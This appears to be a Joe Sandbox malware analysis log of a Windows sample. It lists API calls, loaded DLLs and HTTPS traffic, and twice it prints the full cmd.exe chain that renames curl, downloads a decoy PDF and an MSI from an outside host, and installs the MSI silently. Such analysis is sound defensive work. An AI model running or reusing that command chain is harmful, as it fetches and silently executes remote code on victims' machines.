Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00103EA4 _strdup,fopen,free,fseek,ftell,fread,fclose,free,free,fseek,malloc,malloc,malloc,malloc,MultiByteToWideChar,PFXImportCertStore,free,free,free,free,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,free,CertOpenStore,GetLastError,free,free,free,free,free,CryptStringToBinaryA,free,CertFindCertificateInStore,free,CertCloseStore,calloc,calloc,CertFreeCertificateContext,CertFreeCertificateContext,free,free, |
3_2_00103EA4 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_0010F820 CryptAcquireContextA,CryptCreateHash, |
3_2_0010F820 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_0010F02B CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx, |
3_2_0010F02B |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_0010F860 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, |
3_2_0010F860 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_0010EC10 malloc,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError, |
3_2_0010EC10 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00106400 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, |
3_2_00106400 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00106591 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, |
3_2_00106591 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_0010C6E0 malloc,CryptAcquireContextA,CryptCreateHash,CryptReleaseContext, |
3_2_0010C6E0 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_0010C730 CryptHashData, |
3_2_0010C730 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_0010C750 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, |
3_2_0010C750 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: -----BEGIN PUBLIC KEY----- |
3_2_000E77F7 |
Source: TNheBOJElq.exe |
Binary or memory string: -----BEGIN PUBLIC KEY----- |
|
Source: unknown |
HTTPS traffic detected: 8.209.119.17:443 -> 192.168.2.5:49706 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 8.209.119.17:443 -> 192.168.2.5:49709 version: TLS 1.2 |
Source: |
Binary string: curl.pdb source: TNheBOJElq.exe, 00000003.00000000.2040331928.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.2071726644.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.2056241857.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr |
Source: Joe Sandbox View |
JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_000DDB77 recv,WSAGetLastError, |
3_2_000DDB77 |
Source: global traffic |
HTTP traffic detected: GET /download/pdf HTTP/1.1 Host: dbs5.pwods.com User-Agent: curl/7.83.1 Accept: */* |
Source: global traffic |
HTTP traffic detected: GET /download/agent HTTP/1.1 Host: dbs5.pwods.com User-Agent: curl/7.83.1 Accept: */* |
Source: TNheBOJElq.exe |
String found in binary or memory: Usage: curl [options...] <url> |
Source: TNheBOJElq.exe, 00000003.00000000.2040331928.0000000000115000.00000002.00000001.01000000.00000003.sdmp |
String found in binary or memory: Usage: curl [options...] <url> |
Source: TNheBOJElq.exe, 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmp |
String found in binary or memory: Usage: curl [options...] <url> |
Source: TNheBOJElq.exe, 00000004.00000002.2071726644.0000000000115000.00000002.00000001.01000000.00000003.sdmp |
String found in binary or memory: Usage: curl [options...] <url> |
Source: TNheBOJElq.exe, 00000004.00000000.2056241857.0000000000115000.00000002.00000001.01000000.00000003.sdmp |
String found in binary or memory: Usage: curl [options...] <url> |
Source: TNheBOJElq.exe.0.dr |
String found in binary or memory: Usage: curl [options...] <url> |
Source: global traffic |
DNS traffic detected: DNS query: dbs5.pwods.com |
Source: TNheBOJElq.exe, 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.2071765607.0000000000130000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr |
String found in binary or memory: https://curl.se/P |
Source: TNheBOJElq.exe, 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.2071765607.0000000000130000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr |
String found in binary or memory: https://curl.se/docs/copyright.htmlD |
Source: TNheBOJElq.exe, TNheBOJElq.exe, 00000003.00000000.2040331928.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.2071726644.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.2056241857.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr |
String found in binary or memory: https://curl.se/docs/hsts.html |
Source: TNheBOJElq.exe |
String found in binary or memory: https://curl.se/docs/hsts.html# |
Source: TNheBOJElq.exe, TNheBOJElq.exe, 00000003.00000000.2040331928.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.2071726644.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.2056241857.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr |
String found in binary or memory: https://curl.se/docs/http-cookies.html |
Source: TNheBOJElq.exe |
String found in binary or memory: https://curl.se/docs/http-cookies.html# |
Source: TNheBOJElq.exe, TNheBOJElq.exe, 00000003.00000000.2040331928.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.2071726644.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.2056241857.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr |
String found in binary or memory: https://curl.se/docs/sslcerts.html |
Source: TNheBOJElq.exe |
String found in binary or memory: https://curl.se/docs/sslcerts.htmlcurl |
Source: TNheBOJElq.exe.0.dr |
String found in binary or memory: https://curl.se/libcurl/c/curl_easy_setopt.html |
Source: TNheBOJElq.exe, 00000004.00000002.2071871975.0000000002D70000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://dbs5.pwods.com/download/agent |
Source: TNheBOJElq.exe, 00000003.00000002.2055325705.0000000002A58000.00000004.00000020.00020000.00000000.sdmp, TNheBOJElq.exe, 00000003.00000003.2053825085.0000000002A85000.00000004.00000020.00020000.00000000.sdmp, TNheBOJElq.exe, 00000003.00000003.2053256528.0000000002A85000.00000004.00000020.00020000.00000000.sdmp, TNheBOJElq.exe, 00000003.00000002.2055431756.0000000002A85000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://dbs5.pwods.com/download/pdf |
Source: unknown |
Network traffic detected: HTTP traffic on port 49709 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49706 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49709 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49706 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_000D1535 |
3_2_000D1535 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_000FA8D8 |
3_2_000FA8D8 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_000CE127 |
3_2_000CE127 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_000DA9B3 |
3_2_000DA9B3 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_000EC1FD |
3_2_000EC1FD |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_0010CAA0 |
3_2_0010CAA0 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_000DFAEC |
3_2_000DFAEC |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_001133B0 |
3_2_001133B0 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_000D4415 |
3_2_000D4415 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_000E25B8 |
3_2_000E25B8 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: String function: 000DD6AD appears 302 times |
|
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: String function: 000C913E appears 64 times |
|
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: String function: 000D201D appears 39 times |
|
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: String function: 000D20E6 appears 46 times |
|
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: String function: 000DD632 appears 246 times |
|
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: String function: 000D2564 appears 48 times |
|
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: String function: 000D251E appears 48 times |
|
Source: classification engine |
Classification label: clean8.win@11/3@1/2 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_000C310D CreateToolhelp32Snapshot,GetLastError,CloseHandle,Module32First,Module32Next, |
3_2_000C310D |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2764:120:WilError_03 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Source: TNheBOJElq.exe |
String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all". |
Source: TNheBOJElq.exe |
String found in binary or memory: curl: try 'curl --help' for more information |
Source: TNheBOJElq.exe |
String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all". |
Source: unknown |
Process created: C:\Windows\SysWOW64\cmd.exe cmd /C ""C:\Windows\System32\cmd.exe" /c cd /d "C:\Users\Gloza\AppData\Local\Temp\" & copy c:\windows\system32\curl.exe TNheBOJElq.exe & TNheBOJElq.exe -o "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" https://dbs5.pwods.com/download/pdf & "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" & TNheBOJElq.exe -o bLhLldebqq.msi https://dbs5.pwods.com/download/agent & C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn" |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d "C:\Users\Gloza\AppData\Local\Temp\" |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe TNheBOJElq.exe -o "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" https://dbs5.pwods.com/download/pdf |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe TNheBOJElq.exe -o bLhLldebqq.msi https://dbs5.pwods.com/download/agent |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn |
|
Source: unknown |
Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Section loaded: ntmarta.dll |
Source: C:\Windows\SysWOW64\cmd.exe |
Section loaded: apphelp.dll |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Section loaded: secur32.dll |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Section loaded: sspicli.dll |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Section loaded: iphlpapi.dll |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Section loaded: mswsock.dll |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Section loaded: kernel.appcore.dll |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Section loaded: dnsapi.dll |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Section loaded: rasadhlp.dll |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Section loaded: fwpuclnt.dll |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Section loaded: schannel.dll |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Section loaded: mskeyprotect.dll |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Section loaded: ntasn1.dll |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Section loaded: ncrypt.dll |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Section loaded: ncryptsslp.dll |
Source: C:\Windows\SysWOW64\msiexec.exe |
Section loaded: apphelp.dll |
Source: C:\Windows\SysWOW64\msiexec.exe |
Section loaded: aclayers.dll |
Source: C:\Windows\SysWOW64\msiexec.exe |
Section loaded: mpr.dll |
Source: C:\Windows\SysWOW64\msiexec.exe |
Section loaded: sfc.dll |
Source: C:\Windows\SysWOW64\msiexec.exe |
Section loaded: sfc_os.dll |
Source: C:\Windows\SysWOW64\msiexec.exe |
Section loaded: msi.dll |
Source: C:\Windows\SysWOW64\msiexec.exe |
Section loaded: srpapi.dll |
Source: C:\Windows\SysWOW64\msiexec.exe |
Section loaded: kernel.appcore.dll |
Source: C:\Windows\SysWOW64\msiexec.exe |
Section loaded: tsappcmp.dll |
Source: C:\Windows\SysWOW64\msiexec.exe |
Section loaded: uxtheme.dll |
Source: C:\Windows\SysWOW64\msiexec.exe |
Section loaded: netapi32.dll |
Source: C:\Windows\SysWOW64\msiexec.exe |
Section loaded: wkscli.dll |
Source: C:\Windows\SysWOW64\msiexec.exe |
Section loaded: netutils.dll |
Source: C:\Windows\System32\msiexec.exe |
Section loaded: apphelp.dll |
Source: C:\Windows\System32\msiexec.exe |
Section loaded: aclayers.dll |
Source: C:\Windows\System32\msiexec.exe |
Section loaded: sfc.dll |
Source: C:\Windows\System32\msiexec.exe |
Section loaded: sfc_os.dll |
Source: C:\Windows\System32\msiexec.exe |
Section loaded: kernel.appcore.dll |
Source: C:\Windows\System32\msiexec.exe |
Section loaded: msi.dll |
Source: C:\Windows\System32\msiexec.exe |
Section loaded: tsappcmp.dll |
Source: C:\Windows\System32\msiexec.exe |
Section loaded: userenv.dll |
Source: C:\Windows\System32\msiexec.exe |
Section loaded: profapi.dll |
Source: C:\Windows\System32\msiexec.exe |
Section loaded: sspicli.dll |
Source: C:\Windows\System32\msiexec.exe |
Section loaded: netapi32.dll |
Source: C:\Windows\System32\msiexec.exe |
Section loaded: wkscli.dll |
Source: C:\Windows\System32\msiexec.exe |
Section loaded: netutils.dll |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_000DD33A GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,malloc,malloc,GetSystemDirectoryA,LoadLibraryA,free,free, |
3_2_000DD33A |
Source: C:\Windows\System32\msiexec.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
API coverage: 8.3 % |
Source: C:\Windows\System32\conhost.exe |
Last function: Thread delayed |
Source: TNheBOJElq.exe, 00000004.00000003.2071234434.0000000002F60000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll |
Source: TNheBOJElq.exe, 00000003.00000003.2053382620.0000000002A60000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll|| |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_0011155B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
3_2_0011155B |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00110CB4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
3_2_00110CB4 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_001116BE SetUnhandledExceptionFilter, |
3_2_001116BE |
Source: unknown |
Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ""c:\windows\system32\cmd.exe" /c cd /d "c:\users\gloza\appdata\local\temp\" & copy c:\windows\system32\curl.exe tnhebojelq.exe & tnhebojelq.exe -o "c:\users\gloza\documents\qmqjabdqio.pdf" https://dbs5.pwods.com/download/pdf & "c:\users\gloza\documents\qmqjabdqio.pdf" & tnhebojelq.exe -o blhlldebqq.msi https://dbs5.pwods.com/download/agent & c:\windows\system32\msiexec.exe /i blhlldebqq.msi /qn" |
Source: C:\Windows\SysWOW64\cmd.exe |
Queries volume information: C:\ VolumeInformation |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00111775 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, |
3_2_00111775 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_0010699F socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,ioctlsocket,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket, |
3_2_0010699F |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_000FA8D8 calloc,calloc,___from_strstr_to_strchr,___from_strstr_to_strchr,inet_pton,strncpy,___from_strstr_to_strchr,strtoul,___from_strstr_to_strchr,strtoul,getsockname,WSAGetLastError,free,free,WSAGetLastError,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,getsockname,WSAGetLastError,listen,WSAGetLastError,htons,free,free, |
3_2_000FA8D8 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_000F8490 calloc,calloc,calloc,calloc,calloc,calloc,bind,WSAGetLastError, |
3_2_000F8490 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_000DDEDF strncmp,strncmp,inet_pton,inet_pton,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError, |
3_2_000DDEDF |